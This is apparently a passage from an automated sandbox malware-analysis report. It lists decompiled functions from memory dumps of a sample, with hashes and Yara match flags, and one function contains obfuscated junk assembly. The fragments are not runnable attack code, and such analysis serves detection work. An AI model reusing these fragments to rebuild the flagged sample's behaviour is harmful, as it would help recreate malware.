					L1:
					return E033C0010(0x34967e0, _t5);
				}
			}





                                          0x033da190
                                          0x033da1a6
                                          0x033da1c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033da192
                                          0x033da192
                                          0x033da19f
                                          0x033da19f

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 270a07a807e81314e92a6dc961b245c677710bafa9d15d23dc83d2ff5e11b440
                                          • Instruction ID: 253607f769612a38de0c3876670f79cf2d69bfb3aad898b919b0999c5bb88fa6
                                          • Opcode Fuzzy Hash: 270a07a807e81314e92a6dc961b245c677710bafa9d15d23dc83d2ff5e11b440
                                          • Instruction Fuzzy Hash: FCD02B769310445ADA1EE304AED8B217756E780760F32048FF1070E5A0DB58CCD1920C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407AFA, Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8b68618db8316360a3efbc2d7e789310d9281db1341a46bd70258ec06d09247e
                                          • Instruction ID: cb42dcc494dce583a49f53ba3e765343e06c303cdd258ed76c8f31925c03e6d5
                                          • Opcode Fuzzy Hash: 8b68618db8316360a3efbc2d7e789310d9281db1341a46bd70258ec06d09247e
                                          • Instruction Fuzzy Hash: 94D01273E16118DEDA158DA8AD417A4F338EF47631F1453A7EC08B71908273D9129654
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D16E0, Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033D16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E033D1710(0x34967e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L033C4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                          0x033d16e8
                                          0x033d16ef
                                          0x033d16f3
                                          0x033d16fe
                                          0x00000000
                                          0x033d1700
                                          0x033d170d
                                          0x033d170d
                                          0x033d16f2
                                          0x033d16f2
                                          0x033d16f2
                                          0x033d16f2

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b15f12e1fa30c20c285ae81f7314f48b6b2430603c5b4ce7de27fc9c46244eb
                                          • Instruction ID: 6623cf66518ad24daf34cf004d62aa3f04c46b08a5624156362038434c3e11ea
                                          • Opcode Fuzzy Hash: 0b15f12e1fa30c20c285ae81f7314f48b6b2430603c5b4ce7de27fc9c46244eb
                                          • Instruction Fuzzy Hash: C6D0A77250024053DE6EDB11AC94B147261DB80B91F3C009DF5074D4D0CFA4DCA2E04C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 034253CA, Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E034253CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E033BEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                          0x034253ca
                                          0x034253ce
                                          0x034253d9
                                          0x034253de
                                          0x034253e1
                                          0x034253e1
                                          0x034253e6
                                          0x034253f3
                                          0x00000000
                                          0x034253f8
                                          0x034253fb

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction ID: 7af1fcd421c75573c666cf85c30e44451b97666796e49a7865efc855d956b7f7
                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction Fuzzy Hash: A8E08C359047849FCF12DB48CA90F9EFBF5FB45B00F180048A4086F720C664AC00CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E43F, Relevance: .0, Instructions: 13COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E0040E43F(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				intOrPtr _t40;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t71;
				intOrPtr* _t76;
				signed int _t79;
				void* _t81;

				L0:
				while(1) {
					L0:
					_t76 = __esi - 1;
					 *(_t81 - 0x29) =  *(_t81 - 0x29) >> 0xa8;
					asm("fucomi st0, st6");
					asm("invalid");
					_t70 =  *_t76;
					 *_t76 = _t69;
					L2:
					asm("out dx, eax");
					asm("iretd");
					asm("out 0x3c, al");
					L3:
					if(__eax >= 0xbf) {
						L6:
						_t40 =  *((intOrPtr*)( *((intOrPtr*)(_t81 + 0xc)) + 8));
						_push(_t76);
						_push(_t70);
						_t71 = 0;
						if(_t40 != 8) {
							L11:
							if(_t40 != 0xd) {
								L13:
								if(_t40 != 9) {
									L15:
									if(_t40 != 0x1b) {
										L17:
										if(_t40 != 0x12) {
											L19:
											if(_t40 + 0xffffff90 > 0x17) {
												goto L10;
											} else {
												L20:
												return 1;
											}
										} else {
											L18:
											_t79 =  *((intOrPtr*)(_t81 + 8));
											E0041B7D0(_t79 + 0x113e0, _t79 + 0x12078, 0xc);
											 *(_t79 + 0x112b8) = 5;
											goto L9;
										}
									} else {
										L16:
										_t79 =  *((intOrPtr*)(_t81 + 8));
										E0041B7D0(_t79 + 0x113e0, _t79 + 0x12060, 0xc);
										 *(_t79 + 0x112b8) = 5;
										goto L9;
									}
								} else {
									L14:
									_t79 =  *((intOrPtr*)(_t81 + 8));
									E0041B7D0(_t79 + 0x113e0, _t79 + 0x12090, 0xc);
									 *(_t79 + 0x112b8) = 5;
									goto L9;
								}
							} else {
								L12:
								_t79 =  *((intOrPtr*)(_t81 + 8));
								_push(0x10);
								_push(_t79 + 0x120a8);
								_push(_t79 + 0x113e0);
								goto L8;
							}
						} else {
							L7:
							_t79 =  *((intOrPtr*)(_t81 + 8));
							_push(0x10);
							_push(_t79 + 0x120c0);
							_push(_t79 + 0x113e0);
							L8:
							E0041B7D0();
							 *(_t79 + 0x112b8) = 7;
							L9:
							_t71 = 1;
							E0041B7D0(_t79 + 0x113e0 +  *(_t79 + 0x112b8) * 2, _t79 + 0x112d8, 4);
							 *(_t79 + 0x112b8) =  *(_t79 + 0x112b8) + 2;
							E0040DE40(_t79, 2);
							L10:
							return _t71;
						}
					} else {
						L4:
						_push(0x13f898e5);
						goto 0x83156854;
						asm("adc eax, 0xad1da23");
						continue;
					}
					L21:
				}
				return __eax;
				goto L21;
			}










                                          0x0040e43f
                                          0x0040e43f
                                          0x0040e43f
                                          0x0040e441
                                          0x0040e442
                                          0x0040e41c
                                          0x0040e41f
                                          0x0040e422
                                          0x0040e422
                                          0x0040e423
                                          0x0040e428
                                          0x0040e42b
                                          0x0040e42c
                                          0x0040e42d
                                          0x0040e42f
                                          0x0040e463
                                          0x0040e466
                                          0x0040e469
                                          0x0040e46a
                                          0x0040e46b
                                          0x0040e470
                                          0x0040e4d0
                                          0x0040e4d3
                                          0x0040e4ea
                                          0x0040e4ed
                                          0x0040e513
                                          0x0040e516
                                          0x0040e53f
                                          0x0040e542
                                          0x0040e56b
                                          0x0040e571
                                          0x00000000
                                          0x0040e577
                                          0x0040e577
                                          0x0040e57f
                                          0x0040e57f
                                          0x0040e544
                                          0x0040e544
                                          0x0040e544
                                          0x0040e557
                                          0x0040e55c
                                          0x00000000
                                          0x0040e55c
                                          0x0040e518
                                          0x0040e518
                                          0x0040e518
                                          0x0040e52b
                                          0x0040e530
                                          0x00000000
                                          0x0040e530
                                          0x0040e4ef
                                          0x0040e4ef
                                          0x0040e4ef
                                          0x0040e502
                                          0x0040e507
                                          0x00000000
                                          0x0040e507
                                          0x0040e4d5
                                          0x0040e4d5
                                          0x0040e4d5
                                          0x0040e4d8
                                          0x0040e4e0
                                          0x0040e4e7
                                          0x00000000
                                          0x0040e4e7
                                          0x0040e472
                                          0x0040e472
                                          0x0040e472
                                          0x0040e475
                                          0x0040e47d
                                          0x0040e484
                                          0x0040e485
                                          0x0040e485
                                          0x0040e48a
                                          0x0040e494
                                          0x0040e4ae
                                          0x0040e4b3
                                          0x0040e4b8
                                          0x0040e4c2
                                          0x0040e4ca
                                          0x0040e4cf
                                          0x0040e4cf
                                          0x0040e431
                                          0x0040e431
                                          0x0040e431
                                          0x0040e436
                                          0x0040e43b
                                          0x00000000
                                          0x0040e43b
                                          0x00000000
                                          0x0040e42f
                                          0x0040e450
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: de34a32cdfcc73c6a445b58bf5a719e02000104b93ba660cf3002822fe56411f
                                          • Instruction ID: fc22f095df2dcb4c861b82dbecf303640713b85872eba9a8538a0e8c0b76c885
                                          • Opcode Fuzzy Hash: de34a32cdfcc73c6a445b58bf5a719e02000104b93ba660cf3002822fe56411f
                                          • Instruction Fuzzy Hash: 54B09222F9251C424A245E9A7C050F8F331E697132F9433A6CD98B30C04902802146DC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033BAAB0, Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033BAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                          0x033baab6
                                          0x033baabb
                                          0x0340a442
                                          0x00000000
                                          0x0340a448
                                          0x0340a454
                                          0x0340a454
                                          0x033baac1
                                          0x033baac1
                                          0x033baac6
                                          0x033baac6

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction ID: d2b4e939358f5627e61833e430eab3eeffbe9eab8e3abbbfa997da09a1fbf9a7
                                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction Fuzzy Hash: BAD0E939352E80CFD616CB1DC994B5677B8BB44B44FC904E1E501CBB61E63CD944CA14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D35A1, Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033D35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E033BEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                          0x033d35a1
                                          0x033d35a1
                                          0x033d35a5
                                          0x033d35ab
                                          0x033d35ab
                                          0x033d35b5
                                          0x00000000
                                          0x033d35c1
                                          0x033d35b7

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction ID: 822062d9cf64831850eb85a3b0bcd67e8a3f6dd0fba34705e951d1b9cbd0366d
                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction Fuzzy Hash: 46D0A73F80118099DB03EF10E5947A87377BB00224F5C1095800605951C3354D09D602
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033ADB40, Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033ADB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L033C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                          0x033adb4d
                                          0x033adb54
                                          0x033adb5f
                                          0x033adb56
                                          0x033adb56
                                          0x033adb5c
                                          0x033adb5c

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction ID: e9e18b4f5757d56740ad4437cd3805417ad002297eb70b1f01b00d4a71d763d6
                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction Fuzzy Hash: 3CC08C30290B40AAEB329F20CD51B0077A0BB00F01F4800A06301DA4F0DB7CEC11E600
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0342A537, Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0342A537(intOrPtr _a4, intOrPtr _a8) {

				return L033C8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                          0x0342a553

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction ID: 51f4c326d170f23b59571f7af82d084e0c42c5aa98cb922afaaad96cef2015f0
                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction Fuzzy Hash: C2C01236080288BBCB12AE81CC00F06BB2AEB94B60F008014BA080E5718632EA70EB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033C3A1C, Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033C3A1C(intOrPtr _a4) {
				void* _t5;

				return L033C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                          0x033c3a35

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction ID: e76402123cb7934aeeede49b200cd57eb5d31198320d6ccc988e6366f2c37cf7
                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction Fuzzy Hash: 84C08C32080288BBC722AE42DC00F017B29E790B60F000020B6040A5608536EC60D688
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033B76E2, Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033B76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                          0x033b76e4
                                          0x00000000
                                          0x033b76f8
                                          0x033b76fd

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction ID: 7d08337e686da317b7f03c35572a1ba46b90b0def1cea43a86dcd9fab0c54cf4
                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction Fuzzy Hash: 22C08C741512C45EEB2AD708CEA4B303664EF48608F4C019CBB010D8A1C368AC03D608
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D36CC, Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033D36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L033C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                          0x033d36d2
                                          0x033d36e8
                                          0x033d36d4
                                          0x033d36e5
                                          0x033d36e5

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction ID: c07cb349fb7fd344100529d723706442b1950bc85b24cfd7bb0a09951fa82b77
                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction Fuzzy Hash: B5C02B79161480BBD7269F30CDD0F147264F700A31F6C03587320494F0D52CAC00D200
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033AAD30, Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033AAD30(intOrPtr _a4) {

				return L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                          0x033aad49

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction ID: 5d0d36bd6d38ad5ec45d473a802545ed88b37caad4760de801dba9bbffb483e3
                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction Fuzzy Hash: D8C08C32080288BBC712AA45CD40F117B29E790B60F000020BA040A6618932EC61DA88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033C7D50, Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033C7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                          0x033c7d56
                                          0x033c7d5b
                                          0x033c7d60
                                          0x033c7d5d
                                          0x033c7d5d
                                          0x033c7d5d

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction ID: c190f94f34369ab2a18b2b992e5aa84e383f813d62e99b3f8dd183544c8566f6
                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction Fuzzy Hash: F0B092343119818FCE56EF18C494B1533E8BB44A80F8800D4E800CBA20D229E8008A00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D2ACB, Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033D2ACB() {
				void* _t5;

				return E033BEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                          0x033d2adc

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction ID: 3fdfa48e8d290998f49efcfc2acebaa252adbf8ba485b9426c1b2cc1fd62c3b5
                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction Fuzzy Hash: 84B01232C11540CFCF02EF44D650B997331FB00750F05449091022BE30C228AC01DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9730, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 741e1747e7b324d1d968e29bc37b8d518fe1e5ae7c3ef9825c09fe020836a75a
                                          • Instruction ID: 461357db6149b5a5df46d76931d2266ac12a51b5c3db150662af8a25551ae12d
                                          • Opcode Fuzzy Hash: 741e1747e7b324d1d968e29bc37b8d518fe1e5ae7c3ef9825c09fe020836a75a
                                          • Instruction Fuzzy Hash: 3290026561504806D140B159545C706001597D0341F92D021A1014554DC79D8A5576E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033EA710, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 55027c567d6ff3853e051775748be251dff597a824085389439dd5a35a01c12c
                                          • Instruction ID: 6e846d2fcafbb121762e488b1bd6d91a9ac0069c3af483fb9d4105c5a242dca9
                                          • Opcode Fuzzy Hash: 55027c567d6ff3853e051775748be251dff597a824085389439dd5a35a01c12c
                                          • Instruction Fuzzy Hash: 12900275311044569500E6995848A4A410597F0341B92D025A5004554C869888617161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9B00, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56049ac3261694ff553056162ba898c5776940413841b2c73c42ac4e6160e422
                                          • Instruction ID: 5f3aea41ec455972bd387ba76d0c1428fc275418c9e85a46152a834670d0e30e
                                          • Opcode Fuzzy Hash: 56049ac3261694ff553056162ba898c5776940413841b2c73c42ac4e6160e422
                                          • Instruction Fuzzy Hash: 6690026525104C06D140B15984587070006D7D0741F92C021A1014554D875A896576F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9770, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ba8678d513b816fa0ec9cdd296ed3750688e595ca75f6f18c3163b36aabbcab
                                          • Instruction ID: 00157b2ecd962112a6527b9c7984b5f285f1f896bc30ace39658d91e2e9ec91c
                                          • Opcode Fuzzy Hash: 0ba8678d513b816fa0ec9cdd296ed3750688e595ca75f6f18c3163b36aabbcab
                                          • Instruction Fuzzy Hash: E890026521508846D100A559544CA06000597D0345F92D021A2054595DC7798851B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033EA770, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7cae815ee2f6d7d2b54ca9dd8e676968bd78d8c8e48d31f54108d87b15a3f6ab
                                          • Instruction ID: 800b0a56bb170a35ec20c1e1a7274899c05d03461e7a59f03f7ae826b7aa089a
                                          • Opcode Fuzzy Hash: 7cae815ee2f6d7d2b54ca9dd8e676968bd78d8c8e48d31f54108d87b15a3f6ab
                                          • Instruction Fuzzy Hash: E090027921508846D500A5595848A87000597D0345F92D421A141459CD87988861B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9760, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be94531eaaec2930a1723b2bc72fdf8a7ff9a2a16c04356774b014ccc22e2f22
                                          • Instruction ID: 180b11b6697c1de9c187d513b8e80bab63d23192b69503a43ae7b1fd30550235
                                          • Opcode Fuzzy Hash: be94531eaaec2930a1723b2bc72fdf8a7ff9a2a16c04356774b014ccc22e2f22
                                          • Instruction Fuzzy Hash: D190027521104807D100A159554C707000597D0341F92D421A1414558DD79A88517161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033EA3B0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78224b288952f9126389dd23c85d45e3ec09473657cd1b19287a9293425380a0
                                          • Instruction ID: 0116fcd61ba2c00b2d112b337743871f3c71e327a5e8c1d7cf07fb3bc6d8fc67
                                          • Opcode Fuzzy Hash: 78224b288952f9126389dd23c85d45e3ec09473657cd1b19287a9293425380a0
                                          • Instruction Fuzzy Hash: 6990027521148406D140B159848860B5005A7E0341F92C421E1415554C87598856B261
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9FE0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f77d0c514c1e9d2e32caf28058a6213e5ee6f498f5dbe31502540554905d149
                                          • Instruction ID: de75898f6a3fdd186eae0006b7d7924e56233499d27bd97e9f7525e73168d70e
                                          • Opcode Fuzzy Hash: 5f77d0c514c1e9d2e32caf28058a6213e5ee6f498f5dbe31502540554905d149
                                          • Instruction Fuzzy Hash: CE90027532118806D110A1598448706000597D1341F92C421A1814558D87D988917162
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9A10, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e7d0aaef60bc2a4b1fac688f5eea8eacb26aaa62178d2c5bf58cd1f24e9c607
                                          • Instruction ID: b70a00ca6e8f21097f73d07031014ea4d9a93ac46964d4b173f6a48d4a478249
                                          • Opcode Fuzzy Hash: 9e7d0aaef60bc2a4b1fac688f5eea8eacb26aaa62178d2c5bf58cd1f24e9c607
                                          • Instruction Fuzzy Hash: 2790027521144806D100A159484C747000597D0342F92C021A6154555E87A9C8917571
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9610, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b88846ee1e294fd4e9cc89925868428b145eaedc5d2b5489a315215def12724
